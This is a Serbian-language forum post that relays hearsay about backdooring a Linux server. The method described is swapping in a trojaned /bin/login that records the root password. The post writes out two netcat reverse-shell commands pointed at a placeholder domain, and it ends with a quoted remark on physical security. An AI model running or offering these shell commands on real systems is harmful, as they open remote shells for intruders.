POZzz
Ja sam cuo slicne price na tu temu....[pricao sam s nasim hackerima],oni kazu da moze na nekoliko nacin
to da se uradi,ali nisu ni oni sami sigurni...jedna od fora je da se udje u server,preko mreze,i da se stavi vec pripremljen [izmenjen] program /bin/login,nakon prvog logovanja admina tj root-a,pass se upisuje u neki fajl,nakon nekog vremena preko vec postavljenog backdoor-a,udje se u sistem i pokupi se sifra,copy=>paste....bila je prica da je jedan od njih to uradio sa bash skriptom....nisam pricao stim deckom...tako da neznam da li je to tacno.......
Da napomenem,nije da pljujem ali u nasoj zemlji nema bas puno admina koji su na visokom nivou,a to i dokazuje jedna od jacih fora za jeftih backdoor,pa puno njih i nezna za tu foru
nc neki-domen.com -p 22 -e /bin/sh [ovo se bese kuca kad si vec upao na sistem]
nc -v neki-domen.com -e /bin/sh
zaboravio sm kako ide...ali ko zna net cat znace sta tacno mislim,da samo kazem da se nebavim hackom i slicnom stvarima tako da ja nemam pojma

BTW kao sto kaze acim
Ljudi, zapamtite, mašina je sigurna samo ako je i fizički obezbeđena, dakle, lanci i katanci. Recimo, staviš šifru na BIOS pa ne mogu da prebacim sistem da butuje sa CD-a, OK, otvoriću kućište i resetovati BIOS. Dakle, kod važnih sistema prvo ide fizička bezbednost računara, pa tek posle toga sve ostalo. Vidiš, pre par godina je neko iz Pentagona makao hard disk, tu nema nikakvog hakovanja, jednostavno je neko fizički ukrao disk. O tome je bilo puno vesti na Internetu.